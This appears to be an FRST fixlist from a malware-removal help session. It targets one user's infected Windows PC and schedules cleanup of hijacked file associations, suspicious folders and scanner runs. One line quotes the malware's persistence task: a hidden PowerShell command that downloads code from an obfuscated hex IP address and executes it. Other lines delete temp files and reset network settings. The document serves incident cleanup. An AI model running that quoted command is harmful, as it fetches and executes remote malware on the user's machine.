content copied
content
Start
SystemRestore: On
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-1758440541-3978537159-2615947404-1001\Software\Classes\regfile: <==== ATTENTION
HKU\S-1-5-21-1758440541-3978537159-2615947404-1001\Software\Classes\.reg: => <==== ATTENTION
HKU\S-1-5-21-1758440541-3978537159-2615947404-1001\Software\Classes\.bat: => <==== ATTENTION
HKU\S-1-5-21-1758440541-3978537159-2615947404-1001\Software\Classes\.cmd: => <==== ATTENTION
Task: {6EC52DD6-EE4F-40A8-8D73-3F8C37DA369F} - System32\Tasks\InteractiveServices\SystemTextRegularExpressionsTask.CL-NCLS-1-5-21-1758440541-3978537159-2615947404-1001 => C:\Windows\System32\conhost.exe [1011712 2026-05-13] (Microsoft Windows -> Microsoft Corporation) -> --headless powershell -NoProfile -ExecutionPolicy Bypass -Command "irm 0x87.0xB5.0x5B.0xF6/a | iex" <==== ATTENTION
2026-06-10 22:39 - 2026-06-10 22:39 - 000000000 ____D C:\WINDOWS\system32\Tasks\InteractiveServices
2026-06-11 00:55 - 2026-03-15 00:16 - 000000000 ____D C:\Users\paulg\AppData\Roaming\RenPy
CustomCLSID: HKU\S-1-5-21-1758440541-3978537159-2615947404-1001_Classes\CLSID\{ea412386-9d9a-437a-8ba5-1988ba62ed41}\localserver32 -> "C:\WINDOWS\System32\DriverStore\FileRepository\aispeechapo.inf_amd64_9ae1c2ca003d06fe\AispeechAudioNotify.exe" -ToastActivated => No File
AlternateDataStreams: C:\WINDOWS\tracing:? [16]
AlternateDataStreams: C:\Users\paulg\Application Data:3475e5013ba77da78776dee34d3bcb36 [394]
AlternateDataStreams: C:\Users\paulg\AppData\Roaming:3475e5013ba77da78776dee34d3bcb36 [394]
FirewallRules: [{C81D00F8-09F6-4251-B7D2-1E315A043CB4}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => No File
FirewallRules: [{CFEE3FD9-4DF1-4339-85C3-E69865A7FCBF}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => No File
FirewallRules: [{4E1FCB44-64E6-4D61-9906-566032017C8C}] => (Allow) C:\Program Files\Epic Games\InfinityNikkiEpicLauncher\1.2.0\xstarter.exe => No File
FirewallRules: [{7E067B54-C9CA-47DA-9DA5-26E38E1741FC}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{489528DB-0B92-45BD-B59B-B38A384F2D2D}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [{07CB15DA-37E5-40CB-BC65-AA6292340754}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{B8CA7F76-51D8-4302-96C8-91708599B270}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [{045C0A21-DD4E-4274-97D3-57FC60588D2F}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{BC0EA924-7272-4C09-8415-37E83A9B0700}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [{DBADA8BE-C3F0-4B95-AF5F-8ACB648D8126}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{15FE8AB6-7697-42BF-BD69-992FFF79127C}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [{5E7C3D91-BDCE-4929-A2E4-745550F1042C}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{84DD252D-0BDF-4C9A-A1A9-6DCFE579C7C1}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [{F45FF6DD-45F1-4EEB-918D-745A42060019}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{5A570944-89E3-42B9-8D5C-3E4E084C8BBA}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [{4B024A9A-CDF7-46FC-9B94-C5D61D203AC8}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{97029EBB-2648-4B6B-B5C7-AC67B04F2686}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [{8CB8D689-04D2-4EFB-A9AB-D63A1AAB40FD}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{62831DFB-A251-46ED-B449-0A49FECF5F18}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [{3A732B6E-3DB1-4A2E-8004-C63D952AD5D6}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{28DB9FB4-4517-4B8B-BB1C-D66856F94AC7}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [{CD57291A-CF11-4B7D-816A-54D93270D72D}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{70BFE003-B7DE-4EC7-8E19-F319B9F20C48}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [TCP Query User{D8BF2B6A-E276-4242-AD3C-29ECF806BCCC}C:\games\chrono.trigger.build.1189005.steamgg.net\chrono.trigger.build.11890051\chrono trigger.exe] => (Block) C:\games\chrono.trigger.build.1189005.steamgg.net\chrono.trigger.build.11890051\chrono trigger.exe => No File
FirewallRules: [UDP Query User{5D440676-D40F-425E-BEFA-E3D23766796B}C:\games\chrono.trigger.build.1189005.steamgg.net\chrono.trigger.build.11890051\chrono trigger.exe] => (Block) C:\games\chrono.trigger.build.1189005.steamgg.net\chrono.trigger.build.11890051\chrono trigger.exe => No File
FirewallRules: [{F4FA7028-4DC4-40AF-BC59-685FA211316E}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{12A897C5-C20F-43BA-A123-D44BD27D2A6F}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [{CEC77C44-BBB9-4B69-9579-14EE90B8A6CE}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{74E18828-7482-4D5B-AE4E-69C6ECE04EDF}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [{DAB668D8-91AC-4480-8326-7F345CA22BDB}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{00EAE0D8-C472-47EC-97D2-39596C4949E0}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [{65484668-4304-4508-B258-F9304C24A64C}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{8693A6A8-93EC-40D9-99CA-AF6AC54CF5A0}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [{0EA25D5D-4D81-4CA8-9BDB-5D888337957F}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{2A33449A-FF88-4510-8690-7FB8118389BE}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [{5D3B1256-A4B0-4A66-BA6E-C028A6563BA2}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{437EC8BA-B9D3-4ED1-A6DD-804460947488}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [{1FF0686C-4D09-471F-B5E5-A7F108CE611E}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{79D66017-693A-497C-AE4D-4D6C1C43A523}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [{6C038B78-3C57-4912-8751-6A4245DE7531}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{452A283F-74AE-449A-AEA4-498C9D7E8737}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [{936D315C-598E-4802-83FA-9499A0B09524}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{3AB5A4FE-B838-4AF2-8547-4599263C35CD}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [TCP Query User{A467EC16-5AC4-4C8A-9A08-D215D998BE67}D:\games lan\arena-fps\quake 3 lan\cnq3.exe] => (Allow) D:\games lan\arena-fps\quake 3 lan\cnq3.exe => No File
FirewallRules: [UDP Query User{337E94C5-E744-43BB-941F-A394D654539C}D:\games lan\arena-fps\quake 3 lan\cnq3.exe] => (Allow) D:\games lan\arena-fps\quake 3 lan\cnq3.exe => No File
FirewallRules: [TCP Query User{7DCE89CD-3E54-4DCA-B330-5EDD43399052}D:\games lan\arena-fps\quake 3 lan\quake3.exe] => (Allow) D:\games lan\arena-fps\quake 3 lan\quake3.exe => No File
FirewallRules: [UDP Query User{67C1493E-6641-42B1-B0CE-29BC395CC712}D:\games lan\arena-fps\quake 3 lan\quake3.exe] => (Allow) D:\games lan\arena-fps\quake 3 lan\quake3.exe => No File
FirewallRules: [TCP Query User{29CCBF65-9AD5-4DAB-A336-46B2A5618638}D:\games lan\fps\left 4 dead 2 2.1.3.5\left4dead2.exe] => (Allow) D:\games lan\fps\left 4 dead 2 2.1.3.5\left4dead2.exe => No File
FirewallRules: [UDP Query User{190B3051-AAF1-4F63-8DD4-5E47BECEC1BC}D:\games lan\fps\left 4 dead 2 2.1.3.5\left4dead2.exe] => (Allow) D:\games lan\fps\left 4 dead 2 2.1.3.5\left4dead2.exe => No File
FirewallRules: [TCP Query User{E36DCD44-F564-4945-93AE-81F3166A55A7}D:\games lan\fps\call of duty 2 v1.3.fix\cod2mp_s.exe] => (Allow) D:\games lan\fps\call of duty 2 v1.3.fix\cod2mp_s.exe => No File
FirewallRules: [UDP Query User{9D6A9A4C-0389-491D-A939-EC21428F8001}D:\games lan\fps\call of duty 2 v1.3.fix\cod2mp_s.exe] => (Allow) D:\games lan\fps\call of duty 2 v1.3.fix\cod2mp_s.exe => No File
FirewallRules: [TCP Query User{FAC850C4-BB60-4EDB-A604-E31E6178E756}D:\games lan\rts\warcraft iii 1.26 -iceblitz\war3.exe] => (Allow) D:\games lan\rts\warcraft iii 1.26 -iceblitz\war3.exe => No File
FirewallRules: [UDP Query User{F6DBA81C-29C8-4A7D-957B-05A5235FF9FC}D:\games lan\rts\warcraft iii 1.26 -iceblitz\war3.exe] => (Allow) D:\games lan\rts\warcraft iii 1.26 -iceblitz\war3.exe => No File
FirewallRules: [{8497E1F7-1CB0-4F7D-A4CD-A3330440D9C2}] => (Block) C:\Users\paulg\AppData\Local\Temp\nsz6A14.tmp\left4dead2.dll => No File
FirewallRules: [{B7238883-0D72-4306-B2D2-39F6891F5767}] => (Block) C:\Users\paulg\AppData\Local\Temp\nsz6A14.tmp\left4dead2.exe => No File
FirewallRules: [TCP Query User{9F64FAD2-0211-4D9C-A588-5D297DAACA3C}D:\games lan\fps\killing floor\system\killingfloor.exe] => (Allow) D:\games lan\fps\killing floor\system\killingfloor.exe => No File
FirewallRules: [UDP Query User{9A7C49AB-B4AF-4335-88BC-E4A5BF051409}D:\games lan\fps\killing floor\system\killingfloor.exe] => (Allow) D:\games lan\fps\killing floor\system\killingfloor.exe => No File
HKU\S-1-5-21-1758440541-3978537159-2615947404-1001\...\Run: [GalaxyClient] => [X]
Task: {B4AA8F1D-0093-4384-A3E5-E41ED730E08B} - System32\Tasks\Lenovo\Vantage\StartupFixPlan => C:\Program Files (x86)\Lenovo\VantageService\4.2.24.0\\uninstall.exe /repair (No File)
Task: {F3E6E7ED-A196-4E44-8803-55FAB3AD4E29} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe (No File)
S3 MpKsl3d3b128a; \??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{B0174D3A-F475-437C-8363-8D8E22F92686}\MpKslDrv.sys (No File)
S4 NvModuleTracker; \SystemRoot\System32\DriverStore\FileRepository\nvmoduletracker.inf_amd64_ea6cec41fc5b2a8b\NvModuleTracker.sys (No File)
Task: {9B13BA48-2765-4659-8F62-225D34A49601} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_ERROR_HB => C:\Windows\System32\MRT.exe [222431176 2026-06-10] (Microsoft Windows -> Microsoft Corporation) -> C:\WINDOWS\system32\/EHB /HeartbeatFailure "SubmitHeartbeatReportData" /HeartbeatError "0x80072ee7"
File: C:\Users\paulg\Downloads\FF7Rebirth Ultimate Unreal Engine.ini (No VRR)-3-125-1780930504.zip
Folder: C:\WINDOWS\system32\VRFCAT-Plugins
Folder: C:\Users\paulg\AppData\Roaming\game
Folder: C:\Users\paulg\AppData\Local\sakuragozen
Powershell: Get-ScheduledTask | select -first 30 | Get-ScheduledTaskInfo
Powershell: @("$env:APPDATA","$env:LOCALAPPDATA") | ForEach-Object { Get-ChildItem $_ -Recurse -Filter "index.js" -ErrorAction SilentlyContinue } | Where-Object { $_.FullName -match "discord_desktop_core" } | ForEach-Object { Write-Host "--- $($_.FullName) ---"; (Get-Content $_.FullName -Raw).Substring(0,[Math]::Min(2000,(Get-Content $_.FullName -Raw).Length)) }
Powershell: (Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -ErrorAction SilentlyContinue).PSObject.Properties | Where-Object { $_.Name -match "^[a-z]$" } | ForEach-Object { Write-Host "$($_.Name): $($_.Value)" }
C:\WINDOWS\Temp\*
C:\WINDOWS\SystemTemp\*
C:\Users\paulg\AppData\Local\Temp\*
StartPowerShell:
# Downloads newest AdwCleaner version directly from Malwarebytes, performs an update, scans, cleans and writes the log in console
# Does not clean preinstalled objects, only PUP/Adware
# If you would like to delete preinstalled objects, add an argument /preinstalled to the /clean argument
# If you would like to only scan with it, change the argument from /clean to /scan
New-Item -ItemType Directory -Force -Path "$env:SystemDrive\AdwCleaner" | Out-Null
Invoke-WebRequest -Uri "https://adwcleaner.malwarebytes.com/adwcleaner?channel=release" -OutFile "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe"
Start-Process -FilePath "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe" -ArgumentList "/eula" -Wait -WindowStyle Hidden
$logFile = "$env:SystemDrive\AdwCleaner\AdwCleanerOutputFRST.txt"
Start-Process -FilePath "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe" -ArgumentList "/noreboot /clean" -Wait -WindowStyle Hidden -RedirectStandardOutput $logFile
Get-Content $logFile -Encoding Unicode
Remove-Item -Path $logFile -Force -ErrorAction SilentlyContinue
EndPowerShell:
StartPowershell:
# Replace /scanonly with /clean if you also want to delete items -- however, this will activate a trial license on the system, I do not recommend it
$hmpExe = "$env:TEMP\HitmanPro_x64.exe"
$logFile = "$env:TEMP\HitmanPro_ScanLog.txt"
Invoke-WebRequest -Uri "https://dl.surfright.nl/HitmanPro_x64.exe" -OutFile $hmpExe -UseBasicParsing
$proc = Start-Process $hmpExe -ArgumentList "/ews","/scanonly","/noinstall","/log=`"$logFile`"","/logtype=txt" -Wait -PassThru
if (!(Test-Path $logFile)) { Write-Host "Scan failed (exit $($proc.ExitCode))"; exit 1 }
Get-Content $logFile -Encoding Unicode
EndPowershell:
StartPowerShell:
# This snippet downloads Emsisoft Emergency Kit (EEK) from the Emsisoft's official site, updates it, scans with it.
# Do note that the executable is 300MB and may take some time to download.
# ---
# This will scan for malware and PUP's in 1) system memory 2) important folders as documentation says
# It will scan in compressed archives, in mail archives, in NTFS alternate data streams and use cloud requests
# ---
# You can use argument "/delete" to delete found objects including references but this is permanent and irreversible.
# You can remove the "/quick" argument to do a full scan but that may take longer than what FRST can handle.
# You can use argument "/quarantine="[folder]"" to put found malware into quarantine, but I personally prefer first verifying the detections.
$downloadUrl = "https://dl.emsisoft.com/EmsisoftEmergencyKit.exe"
$systemDrive = $env:SystemDrive
$frstPath = "$systemDrive\FRST"
$savePath = "$frstPath\EEK.exe"
$extractPath = "$frstPath\EEK"
if (-not (Test-Path $frstPath)) {
New-Item -Path $frstPath -ItemType Directory -Force | Out-Null
}
if (-not (Test-Path $extractPath)) {
New-Item -Path $extractPath -ItemType Directory -Force | Out-Null
}
Invoke-WebRequest -Uri $downloadUrl -OutFile $savePath -UseBasicParsing
$proc = Start-Process -FilePath $savePath -ArgumentList "-s -d`"$extractPath`"" -PassThru
while (-not (Test-Path "$extractPath\bin64\a2cmd.exe")) { Start-Sleep -Milliseconds 1000 }
Stop-Process -Id $proc.Id -Force -ErrorAction SilentlyContinue
if ([Environment]::Is64BitOperatingSystem) {
$a2cmdPath = Join-Path $extractPath "bin64\a2cmd.exe"
} else {
$a2cmdPath = Join-Path $extractPath "bin32\a2cmd.exe"
}
Start-Process -FilePath $a2cmdPath -ArgumentList "/update" -Wait -NoNewWindow
Start-Process -FilePath $a2cmdPath -ArgumentList "/malware /quick /m /t /pup /a /am /cloud=1 /la=`"$frstPath\EEK_scan.log`"" -Wait -NoNewWindow
Get-Content "$frstPath\EEK_scan.log"
exit
EndPowerShell:
cmd: del %temp%\*.* /f /s /q
cmd: rd /s /q %temp%
cmd: bitsadmin /reset /allusers
cmd: netsh winsock reset catalog
cmd: ipconfig /flushdns
RemoveProxy:
EmptyTemp:
End
Warning
Executing a Fixlist on the wrong system may permanently damage it. Continue only if this link was meant for you.
To view the content, acknowledge this warning.